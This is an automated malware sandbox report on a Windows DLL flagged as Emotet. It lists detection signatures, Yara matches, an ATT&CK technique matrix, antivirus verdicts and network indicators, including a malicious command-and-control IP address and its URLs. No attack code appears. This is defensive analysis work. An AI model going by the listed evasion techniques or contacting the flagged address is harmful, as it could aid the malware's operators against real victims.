                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC67204558 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_00007FFC67204558
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720E6C0 _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00007FFC6720E6C0

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 0000000F.00000002.790169111.0000010E48613000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.790594396.0000010E48702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.790485031.0000010E48640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 3.2.rundll32.exe.18475ef0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2560000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.1e20000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.164c9870000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.164c9870000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.164c9870000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2451d890000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.164c9870000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2451d890000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.164c9870000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.1e20000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2560000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.18475ef0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.164c9870000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.790902052.0000000002560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.306506166.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.306832170.00000164C9870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.287051568.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.287330316.00000164C9870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.288120370.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.284795408.0000000001E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.288376791.00000164C9870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.282144230.0000018475EF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.791055548.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.283227101.000002451D890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      111
                      Process Injection
                      2
                      Masquerading
                      OS Credential Dumping2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      Exfiltration Over Other Network Medium11
                      Encrypted Channel
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts2
                      Native API
                      Boot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      LSASS Memory51
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                      Ingress Tool Transfer
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)3
                      Virtualization/Sandbox Evasion
                      Security Account Manager3
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                      Process Injection
                      NTDS2
                      Process Discovery
                      Distributed Component Object ModelInput CaptureScheduled Transfer2
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Hidden Files and Directories
                      LSA Secrets1
                      Remote System Discovery
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Obfuscated Files or Information
                      Cached Domain Credentials2
                      File and Directory Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Regsvr32
                      DCSync34
                      System Information Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32
                      Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      DLL Side-Loading
                      /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                      File Deletion
                      Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 626488 Sample: TSvDnT6fkE Startdate: 14/05/2022 Architecture: WINDOWS Score: 80 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Yara detected Emotet 2->48 7 loaddll64.exe 1 2->7         started        9 svchost.exe 2->9         started        12 svchost.exe 1 1 2->12         started        15 9 other processes 2->15 process3 dnsIp4 17 regsvr32.exe 5 7->17         started        20 cmd.exe 1 7->20         started        22 rundll32.exe 2 7->22         started        24 rundll32.exe 7->24         started        50 Changes security center settings (notifications, updates, antivirus, firewall) 9->50 26 MpCmdRun.exe 1 9->26         started        38 127.0.0.1 unknown unknown 12->38 signatures5 process6 signatures7 42 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->42 28 regsvr32.exe 17->28         started        32 rundll32.exe 2 20->32         started        34 WerFault.exe 20 9 24->34         started        36 conhost.exe 26->36         started        process8 dnsIp9 40 23.239.0.12, 443, 49749 LINODE-APLinodeLLCUS United States 28->40 52 System process connects to network (likely due to code injection or exploit) 28->52 54 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->54 signatures10

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      TSvDnT6fkE.dll34%VirustotalBrowse
                      No Antivirus matches
                      SourceDetectionScannerLabelLinkDownload
                      4.2.rundll32.exe.2451d890000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      5.0.rundll32.exe.164c9870000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      5.0.rundll32.exe.164c9870000.4.unpack100%AviraHEUR/AGEN.1215493Download File
                      3.2.rundll32.exe.18475ef0000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      2.2.regsvr32.exe.1e20000.0.unpack100%AviraHEUR/AGEN.1215493Download File
                      5.2.rundll32.exe.164c9870000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      6.2.regsvr32.exe.2560000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://www.pango.co/privacy0%URL Reputationsafe
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      https://23.239.0.12/ionT100%Avira URL Cloudmalware
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      https://activity.windows.comr0%URL Reputationsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://23.239.0.12/$100%Avira URL Cloudmalware
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      http://schemas.xmlso0%Avira URL Cloudsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe
                      https://23.239.0.12/0%URL Reputationsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      https://23.239.0.12/true
                      • URL Reputation: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000C.00000002.330863414.0000020EAE23D000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000C.00000003.330423172.0000020EAE262000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000C.00000002.330863414.0000020EAE23D000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000C.00000003.330445263.0000020EAE259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.330899088.0000020EAE25A000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000C.00000003.330528261.0000020EAE246000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.330467166.0000020EAE240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.330881710.0000020EAE24D000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000C.00000003.330423172.0000020EAE262000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000C.00000002.330867745.0000020EAE242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.330467166.0000020EAE240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.330552452.0000020EAE241000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000C.00000003.330423172.0000020EAE262000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000C.00000003.330435981.0000020EAE25E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000C.00000003.308486479.0000020EAE232000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000C.00000002.330867745.0000020EAE242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.330467166.0000020EAE240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.330552452.0000020EAE241000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.hotspotshield.com/terms/svchost.exe, 00000021.00000003.545574788.00000256D7F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545785063.00000256D7FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545766615.00000256D7F89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545735312.00000256D8403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545834057.00000256D8419000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545608502.00000256D7FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545702842.00000256D8402000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://www.pango.co/privacysvchost.exe, 00000021.00000003.545574788.00000256D7F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545785063.00000256D7FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545766615.00000256D7F89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545735312.00000256D8403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545834057.00000256D8419000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545608502.00000256D7FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545702842.00000256D8402000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.bingmapsportal.comsvchost.exe, 0000000C.00000002.330829301.0000020EAE213000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000C.00000002.330863414.0000020EAE23D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000C.00000003.330423172.0000020EAE262000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000021.00000003.549441713.00000256D7F9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.549424001.00000256D7F8B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.549464281.00000256D7FAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000C.00000003.330547314.0000020EAE256000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://23.239.0.12/ionTregsvr32.exe, 00000006.00000003.350257586.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.790154873.0000000000CA2000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 0000000C.00000002.330922681.0000020EAE26A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.330337408.0000020EAE268000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000C.00000002.330863414.0000020EAE23D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000C.00000003.330547314.0000020EAE256000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.ver)svchost.exe, 00000012.00000002.671797088.000001CF09089000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.583956411.00000256D76EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            low
                                                            https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000C.00000003.330445263.0000020EAE259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.330467166.0000020EAE240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.330899088.0000020EAE25A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000021.00000003.554110007.00000256D7F8B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.554225233.00000256D8402000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://activity.windows.comrsvchost.exe, 0000000A.00000002.790369287.000001A81443C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000C.00000002.330829301.0000020EAE213000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.330863414.0000020EAE23D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://%s.xboxlive.comsvchost.exe, 0000000A.00000002.790369287.000001A81443C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                low
                                                                https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000C.00000003.330528261.0000020EAE246000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.330467166.0000020EAE240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.330881710.0000020EAE24D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000C.00000003.330423172.0000020EAE262000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://23.239.0.12/$regsvr32.exe, 00000006.00000003.350257586.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.790154873.0000000000CA2000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000C.00000003.308486479.0000020EAE232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000C.00000003.330423172.0000020EAE262000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.hotspotshield.com/svchost.exe, 00000021.00000003.545574788.00000256D7F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545785063.00000256D7FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545766615.00000256D7F89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545735312.00000256D8403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545834057.00000256D8419000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545608502.00000256D7FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545702842.00000256D8402000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000C.00000003.330445263.0000020EAE259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.330899088.0000020EAE25A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000021.00000003.549441713.00000256D7F9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.549424001.00000256D7F8B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.549464281.00000256D7FAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000C.00000003.330445263.0000020EAE259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.330899088.0000020EAE25A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://dynamic.tsvchost.exe, 0000000C.00000002.330881710.0000020EAE24D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000C.00000003.330423172.0000020EAE262000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsosvchost.exe, 00000012.00000002.671481394.000001CF038AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://disneyplus.com/legal.svchost.exe, 00000021.00000003.549441713.00000256D7F9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.549424001.00000256D7F8B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.549464281.00000256D7FAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000C.00000002.330859808.0000020EAE23B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.308486479.0000020EAE232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000C.00000002.330899088.0000020EAE25A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://activity.windows.comsvchost.exe, 0000000A.00000002.790369287.000001A81443C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000C.00000003.330423172.0000020EAE262000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://help.disneyplus.com.svchost.exe, 00000021.00000003.549441713.00000256D7F9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.549424001.00000256D7F8B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.549464281.00000256D7FAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://%s.dnet.xboxlive.comsvchost.exe, 0000000A.00000002.790369287.000001A81443C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        low
                                                                                        https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000C.00000003.330445263.0000020EAE259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.330899088.0000020EAE25A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000C.00000003.330435981.0000020EAE25E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            23.239.0.12
                                                                                            unknownUnited States
                                                                                            63949LINODE-APLinodeLLCUStrue
                                                                                            IP
                                                                                            127.0.0.1
                                                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                            Analysis ID:626488
                                                                                            Start date and time: 14/05/202204:42:122022-05-14 04:42:12 +02:00
                                                                                            Joe Sandbox Product:CloudBasic
                                                                                            Overall analysis duration:0h 11m 38s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Sample file name:TSvDnT6fkE (renamed file extension from none to dll)
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                            Number of analysed new started processes analysed:39
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • HDC enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Detection:MAL
                                                                                            Classification:mal80.troj.evad.winDLL@28/10@0/2
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            HDC Information:Failed
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 99%
                                                                                            • Number of executed functions: 48
                                                                                            • Number of non-executed functions: 213
                                                                                            Cookbook Comments:
                                                                                            • Adjust boot time
                                                                                            • Enable AMSI
                                                                                            • Override analysis time to 240s for rundll32
                                                                                            • Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, UpdateNotificationMgr.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 20.189.173.20, 23.211.4.86, 40.127.240.158, 51.11.168.232, 20.223.24.244
                                                                                            • Excluded domains from analysis (whitelisted): fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, sls.update.microsoft.com, settings-prod-neu-1.northeurope.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, settings-prod-uks-1.uksouth.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, atm-settingsfe-prod-geo.trafficmanager.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            TimeTypeDescription
                                                                                            04:43:43API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                            04:43:53API Interceptor11x Sleep call for process: svchost.exe modified
                                                                                            04:44:47API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                            23.239.0.12Xp7X1Yf3CM.dllGet hashmaliciousBrowse
